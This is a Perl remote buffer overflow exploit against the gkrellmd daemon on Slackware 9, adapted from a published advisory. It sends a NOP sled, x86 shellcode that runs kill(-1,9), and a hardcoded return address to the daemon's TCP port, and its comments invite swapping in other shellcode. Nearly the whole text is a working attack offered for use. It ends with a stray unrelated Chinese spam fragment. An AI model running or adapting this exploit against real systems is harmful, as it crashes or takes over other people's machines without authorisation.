#!/usr/bin/perl -s # kokaninATdtors.net playing with gkrellmd on slackware 9 # advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd # I just ripped their code and made it do something useful(?) instead # shellcode by me this time - wow this is badly formatted(again) # the shellcode does kill(-1,9);exit(0) - change it use IO::Socket; if(!$ARGV[0] || !$ARGV[1]) { print "usage: ./DSR-geekrellm-linux.pl (default gkrellmd is 19150)\n"; exit(-1); } $shellcode = "\x31\xdb". "\x4b\x31\xc9\x83\xc1\x09\xb0\x25". "\xcd\x80\x31\xdb\xb0\x01\xcd\x80"; # this is ugly: # xor %ebx, %ebx # dec %ebx # xor %ecx, %ecx # add $0x9, %ecx # movb $0x25, %al # int $0x80 # xorl %ebx, %ebx # movb $0x1, %al # int $0x80 $host = $ARGV[0]; $port = $ARGV[1]; $ret = pack("l",0xbffff738); $nop = "\x90"; $buf = $nop x 134 . $shellcode . $ret x 2; $socket = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "unable to connect to $host:$port ($!)\n" unless $socket; print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have sleep(1); #might have to adjust this on slow connections print $socket $buf; close($socket);

亚洲欧美在线